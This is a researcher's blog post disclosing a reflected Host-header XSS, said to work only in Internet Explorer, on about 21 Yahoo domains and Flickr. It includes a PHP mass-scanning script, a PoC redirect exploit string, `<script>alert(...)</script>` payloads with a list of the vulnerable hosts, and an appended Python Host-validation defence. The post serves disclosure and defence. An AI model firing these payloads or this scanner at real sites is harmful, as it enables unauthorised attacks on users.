Intro

Seems it's time to disclose 21 zero-day XSS on Yahoo.
I don't break any rules or laws of any country (I hope, lol) by posting this publicly: Yahoo officially said they need only 90 days to roll out a fix for any vuln (see https://hackerone.com/yahoo, Yahoo's bug bounty rules). This vuln affects 21 different Yahoo domains and has not been fixed for a year.

I reported this issue 9 months ago (https://hackerone.com/reports/77385) and tried to bump it, but no luck. They said that my report is a dup of https://hackerone.com/reports/54625 (reported around March 2015).

The main purpose of this post is simply to draw the Yahoo security team's attention to this ticket again (and finally get it fixed!).

XSS

Facts:

  • Reflected
  • Works only in IE (tested in IE 10 on Windows 7; should work in IE 7, 8 and 9)
  • Bypasses the IE XSS filter

Based on the technique by https://twitter.com/Black2Fan that lets you inject an XSS payload into the Host header of the user's requests (read more here).

PoC: https://sergeybelove.ru/exploits/yahoo_ie.php (IE only! It just injects an H1 tag)

[Screenshots of the PoC in IE, taken 2015-07-21]

This XSS is caused by the balancer and... affects other domains! I wrote a simple scanner:

<?php

// Collect the Yahoo property domains linked from the "everything" index page.
$html = file_get_contents("https://everything.yahoo.com/");
preg_match_all("/.dd..a.href=.([a-zA-Z\.:\/?_=]*)\"/", $html, $matches);
$domains = array();
foreach ($matches[1] as $match) {
    $target = parse_url($match);
    if (!empty($target['host'])) {
        $domains[] = $target['host'];
    }
}
$domains = array_unique($domains);
sort($domains);

//$domains = array($argv[1]); // uncomment to check a single domain given on the command line
foreach ($domains as $domain) {
    // Only try https if the host actually accepts connections on 443.
    $fp = @fsockopen($domain, 443, $errno, $errstr, 3);
    if ($fp) {
        fclose($fp);
        $schemes = array('http', 'https');
    } else {
        $schemes = array('http');
    }
    foreach ($schemes as $scheme) {
        // we need to try the valid ports 80 & 443 and a non-valid one (444)
        foreach (array(80, 443, 444) as $port) {
            $testing = $scheme."://".$domain;
            $payload = "123123--><script>alert(document.location.origin)</script>";
            // PoC redirect page for this target (the IE trick: the payload in the URL ends up
            // in the Host header). Built for reference only; the scan itself does not use it.
            $exploit = '<?php
header("Location: '.$scheme.'://'.$domain.'%2f--><script>alert(document.location.origin)<%2fscript>%3a'.$port.'");';
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_URL, $testing);
            // Send the payload in the Host header; a vulnerable balancer echoes it back unescaped.
            curl_setopt($ch, CURLOPT_HTTPHEADER, array('Host: '.$domain.$payload.':'.$port));
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
            curl_setopt($ch, CURLOPT_TIMEOUT, 5);
            $result = curl_exec($ch);
            curl_close($ch);
            if ($result !== false && strstr($result, $payload)) {
                echo $testing." with Host: ".$domain.$payload.":".$port." is vulnerable!\n";
                break;
            }
        }
    }
}
?>

I used it for mass checking and found that other domains (including flickr.com) are also vulnerable:

http://advertising.yahoo.com with Host: advertising.yahoo.com123123--><script>alert(document.location.origin)</script>:80 is vulnerable!
http://answers.yahoo.com with Host: answers.yahoo.com123123--><script>alert(document.location.origin)</script>:443 is vulnerable!
http://autos.yahoo.com with Host: autos.yahoo.com123123--><script>alert(document.location.origin)</script>:80 is vulnerable!
http://celebrity.yahoo.com with Host: celebrity.yahoo.com123123--><script>alert(document.location.origin)</script>:80 is vulnerable!
http://developer.yahoo.com with Host: developer.yahoo.com123123--><script>alert(document.location.origin)</script>:80 is vulnerable!
http://finance.yahoo.com with Host: finance.yahoo.com123123--><script>alert(document.location.origin)</script>:80 is vulnerable!
http://games.yahoo.com with Host: games.yahoo.com123123--><script>alert(document.location.origin)</script>:80 is vulnerable!
http://groups.yahoo.com with Host: groups.yahoo.com123123--><script>alert(document.location.origin)</script>:443 is vulnerable!
http://help.yahoo.com with Host: help.yahoo.com123123--><script>alert(document.location.origin)</script>:80 is vulnerable!
http://messenger.yahoo.com with Host: messenger.yahoo.com123123--><script>alert(document.location.origin)</script>:443 is vulnerable!
http://music.yahoo.com with Host: music.yahoo.com123123--><script>alert(document.location.origin)</script>:80 is vulnerable!
http://my.yahoo.com with Host: my.yahoo.com123123--><script>alert(document.location.origin)</script>:443 is vulnerable!
http://news.yahoo.com with Host: news.yahoo.com123123--><script>alert(document.location.origin)</script>:80 is vulnerable!
http://shopping.yahoo.com with Host: shopping.yahoo.com123123--><script>alert(document.location.origin)</script>:80 is vulnerable!
http://sports.yahoo.com with Host: sports.yahoo.com123123--><script>alert(document.location.origin)</script>:80 is vulnerable!
http://weather.yahoo.com with Host: weather.yahoo.com123123--><script>alert(document.location.origin)</script>:80 is vulnerable!
http://www.flickr.com with Host: www.flickr.com123123--><script>alert(document.location.origin)</script>:443 is vulnerable!
http://www.yahoo.com with Host: www.yahoo.com123123--><script>alert(document.location.origin)</script>:443 is vulnerable!

Why 21? Some other domains, like mail on the first screenshot, had to be checked manually.
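As an added example (not code from the post or from Yahoo), this is the check a balancer should apply before it ever echoes a Host header into an error or redirect page: parse it strictly, compare it against an allowlist of served hostnames, and HTML-escape anything that is still reflected. The allowlist, the example.com hostnames and the page wording are assumptions; the rejected input has the shape of the payload used above.

```python
import re
from html import escape

# Assumed allowlist of hostnames this balancer is configured to serve (constructed).
SERVED_HOSTS = {"www.example.com", "news.example.com"}

# RFC 7230: Host = uri-host [ ":" port ]; this accepts DNS reg-names only (no IP literals).
_HOST_RE = re.compile(
    r"^(?P<host>[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*)"
    r"(?::(?P<port>\d{1,5}))?$"
)


def validate_host(header, allowed=SERVED_HOSTS):
    """Return (ok, host, port); ok is False for any malformed or unknown Host value."""
    m = _HOST_RE.match(header)
    if not m:
        return False, None, None
    host = m.group("host").lower()
    port = int(m.group("port")) if m.group("port") else None
    if port is not None and not 1 <= port <= 65535:
        return False, None, None
    if host not in allowed:
        return False, None, None
    return True, host, port


def error_page(header):
    """Body the balancer returns when it has no backend for the request's Host.

    A bad Host is never reflected (that reflection is exactly the bug in the post);
    a valid one is escaped anyway so no markup can ride along."""
    ok, host, port = validate_host(header)
    if not ok:
        return "<h1>400 Bad Request</h1><p>Unknown host.</p>"
    shown = host if port is None else f"{host}:{port}"
    return f"<h1>Service unavailable</h1><p>No backend for {escape(shown)}.</p>"


if __name__ == "__main__":
    # Constructed sample Host values: the last one mirrors the scanner's payload shape.
    for h in ("www.example.com", "News.Example.com:443", "evil.example.com",
              "www.example.com123123--><script>alert(document.location.origin)</script>:80"):
        print(repr(h), "->", validate_host(h))
```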

One more fact: I added a check for XSS through the Host header to my small and free one-button scanner: http://sergeybelove.ru/one-button-scan/

P.S. I found exactly the same vuln on Wikipedia and they fixed it in just a few days. Feel the difference.

UPD: BlackFan tweeted that he reported this issue 2 years ago! And it was a dup.
H1 report by BlackFan


February 28th, 2016

Posted In: bugbounty